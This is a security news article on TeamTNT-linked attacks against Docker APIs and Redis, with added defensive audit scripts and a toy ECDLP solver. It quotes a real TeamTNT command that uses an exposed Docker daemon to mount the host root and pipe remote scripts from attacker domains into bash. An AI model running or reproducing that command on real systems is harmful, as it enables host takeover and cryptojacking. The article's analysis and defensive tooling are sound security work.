A former threat actor has returned with new attacks targeting encryption keys, the cloud, and containers

The Aqua Nautilus research team has found three attacks that mirror those previously carried out by TeamTNT, a threat actor that targets cloud resources such as Kubernetes clusters, Redis servers, and Docker APIs.

These cybercriminals are known for their creativity and their ability to attack cloud environments, having devised new techniques in 2020. After several successful campaigns in 2020 and 2021, they announced their retirement on Twitter. Aqua Nautilus notes, however, that “their infrastructure continued to automatically infect new victims with old malware as their tools included various worms that could scan and infect new targets.”

In other words, the worms and older malware kept scanning for and infecting fresh targets on their own. The researchers are confident that the threat actor is back because their honeypots captured TeamTNT indicators and tools in a series of three attacks during the first week of September.

The “Kangaroo attack” was the most troublesome of the three; the other two are the “Cronb” and “What Will Be” attacks. These attacks specifically target APIs and Docker instances.

Researchers Discover a Connection in the Attacks

Private and public key pairs underpin the encryption of internet communications, including SSL and SSH. The mathematical problem that makes the process irreversible is the Elliptic Curve Discrete Logarithm Problem (ECDLP).

The fundamental tenet of modern cryptography is that encryption must be a one-way process: only the key is meant to open the gate. According to Aqua Nautilus researchers, however, the shell script used in the Kangaroo attack contained evidence of Pollard’s Kangaroo interval ECDLP solver.

Through a misconfigured Docker daemon, the attackers run a command line that pulls a fork of a secp256k1 ECDLP solver. The procedure may be relatively complex, but the end result is straightforward: the victims’ processing resources are stolen in an effort to solve the mathematical riddle.

Solving ECDLP is extremely hard in theory, but the potential payout is enormous: a working solver would give thieves access to almost everything protected by such keys online, including Bitcoin wallets.
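To make concrete why ECDLP is called hard yet still tempts an attacker into burning stolen CPU time on it, here is an added educational example of Pollard’s kangaroo (my own code, not from the article, from Aqua Nautilus, or from the attackers’ repository). It uses a toy curve with the same y^2 = x^3 + 7 shape as secp256k1 but over a 31-bit prime, and a secret confined to a 20-bit interval; the prime, generator and secret are all constructed. The point to take away is the cost: the kangaroo walk recovers the key in roughly 2·sqrt(w) group operations for an interval of width w, so a 20-bit interval costs a couple of thousand steps, while the 256-bit keyspace of a real wallet puts the same method at around 2^128 operations, which no number of hijacked Docker hosts brings into reach.

```python
"""Toy Pollard kangaroo ECDLP solver on a small curve (educational; useless against real keys)."""
import math

# Constructed toy curve y^2 = x^3 + 7 over F_p: the secp256k1 equation with a 31-bit prime.
# p % 4 == 3 makes modular square roots a single exponentiation.
P = 2**31 - 1
B = 7
INF = None  # point at infinity


def add(p1, p2):
    """Affine point addition; handles doubling and the identity."""
    if p1 is INF:
        return p2
    if p2 is INF:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2:
        if (y1 + y2) % P == 0:
            return INF                                  # p1 == -p2
        lam = 3 * x1 * x1 * pow(2 * y1, -1, P) % P     # tangent slope (a == 0)
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)


def neg(pt):
    return INF if pt is INF else (pt[0], (-pt[1]) % P)


def mul(k, pt):
    """Double-and-add scalar multiplication; a negative k multiplies by -pt."""
    if k < 0:
        return mul(-k, neg(pt))
    acc = INF
    while k:
        if k & 1:
            acc = add(acc, pt)
        pt = add(pt, pt)
        k >>= 1
    return acc


def find_generator():
    """First curve point with a small x; rhs^((p+1)/4) is a square root when p % 4 == 3."""
    for x in range(1, P):
        rhs = (x**3 + B) % P
        y = pow(rhs, (P + 1) // 4, P)
        if y * y % P == rhs:
            return (x, y)


def kangaroo(G, Q, lo, hi):
    """Return (k, steps) with k*G == Q for some k in [lo, hi], or raise ValueError.

    The tame kangaroo starts at hi*G, the wild one at Q. Both hop by jumps[x mod m],
    a set of powers of two whose mean is about sqrt(w)/2. When the two land on the
    same point, the difference of their accumulated distances reveals k. Expected
    work is about 2*sqrt(hi - lo) group additions.
    """
    w = hi - lo
    mean = max(1, math.isqrt(w) // 2)
    m = 1
    while (2 ** (m + 1) - 1) / (m + 1) <= mean:
        m += 1
    jumps = [2**i for i in range(m)]
    jump_pts = [mul(j, G) for j in jumps]

    def idx(pt):
        return 0 if pt is INF else pt[0] % m

    tame, tame_d = mul(hi, G), 0
    wild, wild_d = Q, 0
    if tame == wild:
        return hi, 0
    tame_seen, wild_seen = {tame: 0}, {wild: 0}
    max_steps = 200 * math.isqrt(w) + 1000
    for steps in range(1, max_steps + 1):
        j = idx(tame)
        tame, tame_d = add(tame, jump_pts[j]), tame_d + jumps[j]
        j = idx(wild)
        wild, wild_d = add(wild, jump_pts[j]), wild_d + jumps[j]
        tame_seen[tame] = tame_d
        wild_seen[wild] = wild_d
        if tame in wild_seen:                     # tame landed on the wild trail
            cand = hi + tame_d - wild_seen[tame]
        elif wild in tame_seen:                   # wild landed on the tame trail
            cand = hi + tame_seen[wild] - wild_d
        else:
            continue
        if mul(cand, G) == Q:
            return cand, steps
    raise ValueError("no collision within the step budget")


if __name__ == "__main__":
    G = find_generator()
    secret = 703710                              # constructed secret, inside [0, 2**20)
    k, steps = kangaroo(G, mul(secret, G), 0, 2**20)
    print(f"recovered k={k} in {steps} steps; sqrt(w)={math.isqrt(2**20)}")
```

Widening the interval by a factor of four only doubles the step count, which is exactly the square-root behaviour that makes the method attractive against small key ranges and hopeless against a full-size one.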

Stealing computing power in this way is very common in malware; cryptominers are the obvious example. The attackers use the idle computing capacity of the targeted machines to mine bitcoin. This is what the “Cronb attack” does: it targets vulnerable Redis instances and launches a cryptomining campaign.

Researchers found that TeamTNT had previously carried out attacks under the name “Cronb,” and that the same methods and tools were used again here to locate vulnerable Redis instances, gain persistence, siphon off resources, and evade detection. The script, however, had been modified to point to brand-new command and control sites.
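Since the Cronb attack starts by locating Redis instances that are reachable and unprotected, a defender’s first check is the server’s own configuration. The following added example (my own, not from the article or from Aqua Nautilus) parses redis.conf text and flags the settings that leave an instance open to anyone who can reach the port; both configuration fragments are constructed for the example.

```python
"""Flag redis.conf settings that leave an instance open to the kind of hijacking Cronb relies on."""

# Constructed redis.conf fragments: one exposed, one hardened. Neither is from the article.
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
port 6379
# requirepass is not set
"""

HARDENED_CONF = """
bind 127.0.0.1
protected-mode yes
port 6379
requirepass replace-with-a-long-random-secret
rename-command CONFIG ""
rename-command FLUSHALL ""
"""


def parse_conf(text):
    """Map each directive (lower-cased) to the list of argument lists it was given."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf


def audit_redis(text):
    """Return a list of findings; an empty list means none of the checked weaknesses is present."""
    conf = parse_conf(text)
    findings = []
    binds = [addr for args in conf.get("bind", []) for addr in args]
    if not binds or any(addr in ("0.0.0.0", "*", "::", "-::*") for addr in binds):
        findings.append("bind: listens on all interfaces (unset or 0.0.0.0)")
    pm = (conf.get("protected-mode") or [["yes"]])[0]
    if pm and pm[0].lower() == "no":
        findings.append("protected-mode no: remote clients are not rejected when no password is set")
    if "requirepass" not in conf:
        findings.append("requirepass unset: any client that reaches the port has full access")
    disabled = {args[0].upper() for args in conf.get("rename-command", [])
                if len(args) >= 2 and args[1] == '""'}
    if "CONFIG" not in disabled:
        findings.append("CONFIG not disabled with rename-command: clients can change runtime settings")
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit_redis(text) or "no findings")
```

Run it against the real file with `audit_redis(open("/etc/redis/redis.conf").read())`; the weak fragment produces four findings and the hardened one none.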

The third and final attack, “What Will Be,” uses weakly protected Docker APIs to download malware and issue unauthorized commands. The attackers escape the Docker container by exploiting a flaw in the release agent, a script that is invoked at the end of each process in privileged containers.

Researchers were able to trace the Kangaroo attack back to a GitHub project. Bash scripts and comments mentioning TeamTNT can be found in a second repository called “dock,” controlled by the associated GitHub account “wafferz,” which is German for “armory”:

#docker -H tcp://$ipaddy:$2 run -d --name teamtnt -v /:/mnt alpine chroot /mnt /bin/sh -c "curl -sLk http://teamtnt.red/Kuben/sh/scan.sh | bash;curl -# -Lk http://chimaera.cc/sh/mo.sh | bash;while true; do sleep 9999;done"
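The command above only works because the Docker daemon at $ipaddy accepts unauthenticated TCP connections, and the container it starts gets the host’s root filesystem bind-mounted at /mnt and chroots into it. The following added example (my own, not from the article, from Aqua Nautilus, or from the wafferz repository) audits daemon.json and `docker inspect` output for exactly those conditions. The two inspect records and the daemon.json are constructed to mirror the quoted command, with the download URL replaced by a placeholder.

```python
"""Audit docker inspect output and daemon.json for the exposure pattern behind the quoted command."""
import json

# Constructed sample shaped like `docker inspect` output, trimmed to the fields the audit uses:
# one container matching the quoted TeamTNT command line and one ordinary web container.
SAMPLE_INSPECT = json.loads("""
[
  {
    "Name": "/teamtnt",
    "Config": {"Image": "alpine",
               "Cmd": ["chroot", "/mnt", "/bin/sh", "-c",
                       "curl -sLk http://PLACEHOLDER.invalid/scan.sh | bash"]},
    "HostConfig": {"Privileged": false, "Binds": ["/:/mnt"], "CapAdd": null},
    "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/mnt", "RW": true}]
  },
  {
    "Name": "/web",
    "Config": {"Image": "nginx:1.25", "Cmd": ["nginx", "-g", "daemon off;"]},
    "HostConfig": {"Privileged": false, "Binds": ["/srv/www:/usr/share/nginx/html:ro"], "CapAdd": null},
    "Mounts": [{"Type": "bind", "Source": "/srv/www", "Destination": "/usr/share/nginx/html", "RW": false}]
  }
]
""")

# Constructed /etc/docker/daemon.json: a TCP listener with no tlsverify, so anyone who can reach
# port 2375 can drive the daemon with `docker -H tcp://host:2375 ...` exactly as in the quoted line.
SAMPLE_DAEMON_JSON = json.loads('{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}')


def audit_daemon(cfg):
    """Flag TCP listeners configured without TLS client certificate verification."""
    findings = []
    for host in cfg.get("hosts", []):
        if host.startswith("tcp://") and not cfg.get("tlsverify", False):
            findings.append(f"daemon listens on {host} without tlsverify (unauthenticated remote API)")
    return findings


def audit_container(c):
    """Flag settings that hand a container the host: privileged mode, root bind mounts, chroot into them."""
    findings = []
    name = c.get("Name", "?").lstrip("/")
    hc = c.get("HostConfig", {})
    if hc.get("Privileged"):
        findings.append(f"{name}: runs --privileged (host devices and cgroup filesystem writable)")
    if "SYS_ADMIN" in (hc.get("CapAdd") or []):
        findings.append(f"{name}: CAP_SYS_ADMIN added")
    host_mounts = [m["Destination"] for m in c.get("Mounts", [])
                   if m.get("Type") == "bind" and m.get("Source") == "/"]
    for dest in host_mounts:
        findings.append(f"{name}: host root bind-mounted at {dest}")
    cmd = " ".join(c.get("Config", {}).get("Cmd") or [])
    if host_mounts and "chroot" in cmd:
        findings.append(f"{name}: command chroots into the host mount: {cmd[:60]}")
    return findings


def audit_all(containers, daemon_cfg):
    """Combine daemon-level and per-container findings into one list."""
    findings = audit_daemon(daemon_cfg)
    for c in containers:
        findings.extend(audit_container(c))
    return findings


if __name__ == "__main__":
    # On a real host: docker inspect $(docker ps -q) > inspect.json; cat /etc/docker/daemon.json
    for line in audit_all(SAMPLE_INSPECT, SAMPLE_DAEMON_JSON):
        print("FINDING:", line)
```

The teamtnt record yields two findings (host root mounted at /mnt, and a command that chroots into it) and the daemon.json one more, while the nginx container is clean; feeding the script real `docker inspect` JSON and the host’s daemon.json is a quick way to confirm that neither condition exists on a fleet.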

 
